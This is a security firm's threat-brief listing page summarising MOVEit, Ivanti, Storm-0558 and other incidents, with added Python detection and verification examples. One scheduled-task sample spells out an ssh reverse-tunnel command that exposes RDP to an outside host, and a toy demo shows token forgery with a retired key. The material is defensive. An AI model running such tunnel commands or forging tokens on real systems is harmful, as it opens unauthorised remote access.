Category: Threat Briefs

MOVEit Authentication Bypass (CVE-2024-5806)

Threat Summary: A vulnerability in MOVEit Transfer and MOVEit Gateway was announced on June 25th, 2024. It affects versions from 2023.0.0 before 2023.0.11, from 2023.1.0 before 2023.1.6, and from 2024.0.0 before 2024.0.2. The vulnerability is classified as Improper Authentication (CWE-287) and carries a CVSS score of 9.1 (Critical). An attacker can arbitrarily authenticate into the MOVEit […]
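A quick way to turn the affected-version ranges above into a check you can run against an inventory export. This is an added example, not code from the brief or from Progress; the ranges are exactly the three the brief lists, and a build outside them is reported as "not in a listed affected range" rather than as safe, since the brief says nothing about other release lines.

```python
# Added example (not from the Lumifi brief): decide whether a MOVEit Transfer /
# Gateway build falls inside the affected ranges the brief quotes for
# CVE-2024-5806. Only the ranges the brief lists are encoded here.
from typing import Optional

# (inclusive lower bound, exclusive upper bound); the upper bound is the first
# fixed build of that release line, as stated in the brief.
AFFECTED_RANGES = [
    ((2023, 0, 0), (2023, 0, 11)),
    ((2023, 1, 0), (2023, 1, 6)),
    ((2024, 0, 0), (2024, 0, 2)),
]


def parse_version(version: str) -> tuple:
    """Turn '2023.0.10' into (2023, 0, 10); pads missing components with 0."""
    parts = version.strip().split(".")
    if not parts or not all(p.isdigit() for p in parts):
        raise ValueError(f"unparseable MOVEit version: {version!r}")
    nums = tuple(int(p) for p in parts)
    return nums + (0,) * (3 - len(nums))   # allow '2024.0' as shorthand for 2024.0.0


def assess(version: str) -> tuple[bool, Optional[str]]:
    """Return (affected, first_fixed_version) for CVE-2024-5806.

    Tuple comparison gives the same ordering as the vendor's
    'from X before Y' wording, so 2023.0.10 < 2023.0.11 but 2023.0.11 is fixed.
    """
    v = parse_version(version)
    for low, high in AFFECTED_RANGES:
        if low <= v < high:
            return True, ".".join(map(str, high))
    return False, None


if __name__ == "__main__":
    # Constructed sample inventory, not real hosts.
    for build in ["2023.0.10", "2023.0.11", "2023.1.5", "2024.0.1", "2024.0.2", "2022.1.9"]:
        affected, fixed = assess(build)
        verdict = f"AFFECTED, upgrade to {fixed}" if affected else "not in a listed affected range"
        print(f"{build}: {verdict}")
```

Feed it the version string MOVEit reports (for example from the admin UI or the installed-programs list) and treat any "AFFECTED" result as a patch-now item; a "not in a listed affected range" result only means the brief's ranges do not cover that build.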
ToddyCat is Making Holes in your Infrastructure

Kaspersky Labs published an article detailing activities they observed from ToddyCat, an APT threat actor targeting government and defense organizations in the Asia Pacific region. Kaspersky focused on the tools and techniques ToddyCat employed for traffic tunneling and data collection. Kaspersky observed ToddyCat dropping and configuring OpenSSH on compromised Windows hosts. A scheduled task was […]
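The summary above describes OpenSSH being dropped on Windows hosts and used for traffic tunnelling, with a scheduled task involved. Below is an added hunting example, written for this page and not taken from Kaspersky's report or from Lumifi: it reviews exported Task Scheduler XML (the format produced by `schtasks /query /xml` or `Export-ScheduledTask`) and flags actions that launch an OpenSSH binary from outside the in-box OpenSSH directories, or that pass `ssh -R` to open a reverse tunnel. The assumption that a scheduled task launches the dropped binary, the list of "expected" OpenSSH directories, and the three sample tasks are all constructed for the example.

```python
# Added example (not Kaspersky's or Lumifi's code): hunt exported Windows
# scheduled-task XML for OpenSSH binaries run from unexpected paths or with
# reverse-tunnel arguments. Sample task XML below is constructed, not real telemetry.
import xml.etree.ElementTree as ET
from pathlib import PureWindowsPath

# Namespace used by Task Scheduler XML (schtasks /query /xml, Export-ScheduledTask).
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

OPENSSH_BINARIES = {"ssh.exe", "sshd.exe", "ssh-agent.exe", "sftp-server.exe"}
# Assumption for this example: the in-box Windows OpenSSH components live here;
# a copy running from anywhere else (ProgramData, Users\Public, temp dirs) is
# worth a look because attacker-dropped binaries land in writable locations.
EXPECTED_DIRS = {r"c:\windows\system32\openssh", r"c:\program files\openssh"}


def review_task(task_xml: str) -> list[str]:
    """Return findings for one scheduled task; an empty list means nothing odd."""
    findings = []
    root = ET.fromstring(task_xml)
    for action in root.findall(".//t:Actions/t:Exec", NS):
        command = (action.findtext("t:Command", default="", namespaces=NS) or "").strip().strip('"')
        arguments = action.findtext("t:Arguments", default="", namespaces=NS) or ""
        exe = PureWindowsPath(command)
        if exe.name.lower() not in OPENSSH_BINARIES:
            continue
        if str(exe.parent).lower() not in EXPECTED_DIRS:
            findings.append(f"OpenSSH binary launched from unexpected path: {command}")
        # ssh -R <port>:<host>:<port> publishes an internal service on the remote
        # side, i.e. the tunnelling pattern the brief describes.
        if any(tok.startswith("-R") for tok in arguments.split()):
            findings.append(f"reverse tunnel requested via ssh arguments: {arguments}")
    return findings


# Constructed sample tasks (no XML declaration, so they parse straight from str).
BENIGN_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions Context="Author">
    <Exec>
      <Command>C:\Windows\System32\OpenSSH\ssh-agent.exe</Command>
    </Exec>
  </Actions>
</Task>"""

REVERSE_TUNNEL_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions Context="Author">
    <Exec>
      <Command>C:\ProgramData\ssh.exe</Command>
      <Arguments>-N -R 0:127.0.0.1:3389 -i C:\ProgramData\id_rsa -o StrictHostKeyChecking=no user@203.0.113.10</Arguments>
    </Exec>
  </Actions>
</Task>"""

DROPPED_SSHD_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions Context="Author">
    <Exec>
      <Command>"C:\Users\Public\sshd.exe"</Command>
      <Arguments>-f C:\Users\Public\sshd_config</Arguments>
    </Exec>
  </Actions>
</Task>"""


if __name__ == "__main__":
    for name, xml in [("benign", BENIGN_TASK), ("reverse_tunnel", REVERSE_TUNNEL_TASK), ("dropped_sshd", DROPPED_SSHD_TASK)]:
        print(name, review_task(xml) or "clean")
```

To run it over a fleet, export every task (`schtasks /query /xml ONE` on each host, or `Get-ScheduledTask | Export-ScheduledTask` from PowerShell) and pass each XML document to `review_task`; tune `EXPECTED_DIRS` to wherever your own build legitimately installs OpenSSH, since the set above is an assumption rather than an authoritative list.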
Mitigating Risk: Understanding Vulnerabilities in the Ivanti Product Suite

In recent months, the Ivanti product suite has encountered several high-profile vulnerabilities, raising concerns within the cybersecurity community. Since the start of the calendar year, four critical vulnerabilities have been associated with Ivanti Connect Secure, Policy Secure, and Neurons. While the vendor has diligently addressed each vulnerability and deployed mitigations, the recurrence of vulnerabilities within […]
Scattered Spider, Oktapus, UNC3944, Scatter Swine – MGM Resorts Compromise

Threat Summary: On September 11th, 2023, MGM Resorts suffered a crippling ransomware attack that resulted in 10 days of computer system downtime and an estimated overall loss of $80,000,000. The threat actor, dubbed Scattered Spider, has claimed responsibility for the attack and claims ties to the infamous ALPHV/BlackCat ransomware gang. In […]
Flax Typhoon APT 

Threat Summary: Flax Typhoon is a suspected China-based, nation-state threat actor whose TTPs appear to be closely aligned with espionage objectives and extended persistence. Despite activity tracing back to mid-2021, this APT's final objectives are unknown. It has been observed mostly targeting government, education, and critical manufacturing organizations in Taiwan, though a small subset of […]
Ivanti/MobileIron Sentry Authentication Bypass Vulnerability (CVE-2023-38035)

CVE-2023-38035 Threat Summary: CVE-2023-38035 allows an unauthenticated attacker to access sensitive admin configuration APIs on versions 9.18 and prior of Ivanti Sentry over port 8443. These configuration APIs are then used by the MobileIron Configuration Service (MICS), which upon successful exploitation, could lead to remote code execution with root permissions and configuration changes to MICS. […]
Storm-0558 Unleashes Authentication Token Forgery

Threat Summary: Storm-0558 is suspected to be a China-based, nation-state threat actor whose TTPs are closely aligned with espionage objectives. This threat actor managed to compromise an inactive MSA signing key which was then used to sign fabricated authentication tokens. Authentication tokens are short-lived credentials that are used to authenticate users to a service. They […]
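The summary above turns on one detail: the forged tokens were signed with a key that was genuinely the provider's, but no longer in active use. A verifier that only asks "is this signature valid under the key named in the token?" accepts them; one that also asks "is that key still one the issuer trusts right now?" does not. The example below is added for this page and is not Microsoft's or Lumifi's code. It uses HMAC secrets as a stand-in for the RSA signing keys a real identity provider uses, a constructed two-entry key registry with made-up key IDs, and a fixed clock; `require_active_key=False` reproduces the weak behaviour, the default reproduces the hardened one, and the short-lived `exp` claim the summary mentions is checked in both.

```python
# Added example (not Microsoft's or Lumifi's code): why a token verifier must
# check the *lifecycle* of the signing key, not just the signature. HMAC-SHA256
# stands in for RSA; key IDs, secrets and claims are constructed.
import base64
import hashlib
import hmac
import json


def _b64u(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def _b64u_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


# Constructed key registry. The "status" field is the point: a retired key is
# still *known* to the verifier (it may be kept to diagnose old tokens), but it
# must not be accepted for new authentication.
KEYS = {
    "msa-2024-01": {"secret": b"active-signing-secret", "status": "active"},
    "msa-2016-07": {"secret": b"old-signing-secret",    "status": "retired"},
}


def sign(kid: str, claims: dict, secret: bytes) -> str:
    """Issue a compact JWT-style token: b64u(header).b64u(claims).b64u(sig)."""
    header = {"alg": "HS256", "typ": "JWT", "kid": kid}
    body = ".".join(_b64u(json.dumps(part, separators=(",", ":")).encode()) for part in (header, claims))
    sig = hmac.new(secret, body.encode(), hashlib.sha256).digest()
    return f"{body}.{_b64u(sig)}"


def verify(token: str, keys: dict, now: int, require_active_key: bool = True) -> tuple[bool, str]:
    """Verify a token. require_active_key=False is the weak verifier that trusts
    any key the registry has ever known; True is the hardened form."""
    parts = token.split(".")
    if len(parts) != 3:
        return False, "malformed token"
    h, p, s = parts
    try:
        header = json.loads(_b64u_decode(h))
        claims = json.loads(_b64u_decode(p))
        signature = _b64u_decode(s)
    except ValueError:  # bad base64, bad UTF-8 or bad JSON all derive from ValueError
        return False, "malformed token"
    if header.get("alg") != "HS256":          # pin the algorithm; never trust the token's choice
        return False, f"unsupported alg {header.get('alg')!r}"
    kid = header.get("kid")
    entry = keys.get(kid)
    if entry is None:
        return False, f"unknown kid {kid!r}"
    if require_active_key and entry["status"] != "active":
        return False, f"kid {kid!r} is {entry['status']}"
    expected = hmac.new(entry["secret"], f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, signature):
        return False, "bad signature"
    if not isinstance(claims.get("exp"), int) or claims["exp"] <= now:
        return False, "expired"
    return True, "ok"


NOW = 1_700_000_000   # fixed clock so the demo is reproducible
CLAIMS = {"sub": "alice@example.test", "aud": "mail-service", "iat": NOW, "exp": NOW + 600}


def demo() -> dict:
    """Legitimate token, a token forged with the retired key's material, and a stale token."""
    legit = sign("msa-2024-01", CLAIMS, KEYS["msa-2024-01"]["secret"])
    # The attacker holds the retired key, as in the Storm-0558 case: the
    # signature is mathematically valid, the key is simply not one to trust.
    forged = sign("msa-2016-07", CLAIMS, KEYS["msa-2016-07"]["secret"])
    stale = sign("msa-2024-01", {**CLAIMS, "exp": NOW - 1}, KEYS["msa-2024-01"]["secret"])
    return {
        "legit": verify(legit, KEYS, NOW),
        "forged_legacy": verify(forged, KEYS, NOW, require_active_key=False),
        "forged_hardened": verify(forged, KEYS, NOW),
        "stale": verify(stale, KEYS, NOW),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:16s} -> {result}")
```

The design point is that key material and key trust are separate facts: rotating a key is not enough if verifiers keep honouring whatever `kid` a token names, so the active set has to be enforced at verification time, and retired keys should be treated as compromised once they are out of service.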
Update on PrintNightmare & Kaseya Ransomware

Over the 4th of July weekend, two breaches were brought to Lumifi's attention pertaining to PrintNightmare and Kaseya. Details on PrintNightmare While you likely do not have Print Servers exposed to the world (we hope not), we also wanted to note that we are aware of this and have diligently reviewed detection methodology. POC code […]

F5 BIG-IP Vulnerabilities

Twelve days ago, F5 announced several security vulnerabilities that were largely overshadowed by the Exchange/Hafnium situation. It's important to understand that some of these are critical, remote command execution-level vulnerabilities that require nothing more than an attacker being able to connect to an F5 BIG-IP device. For those devices, being positioned "in front of" web server clusters […]
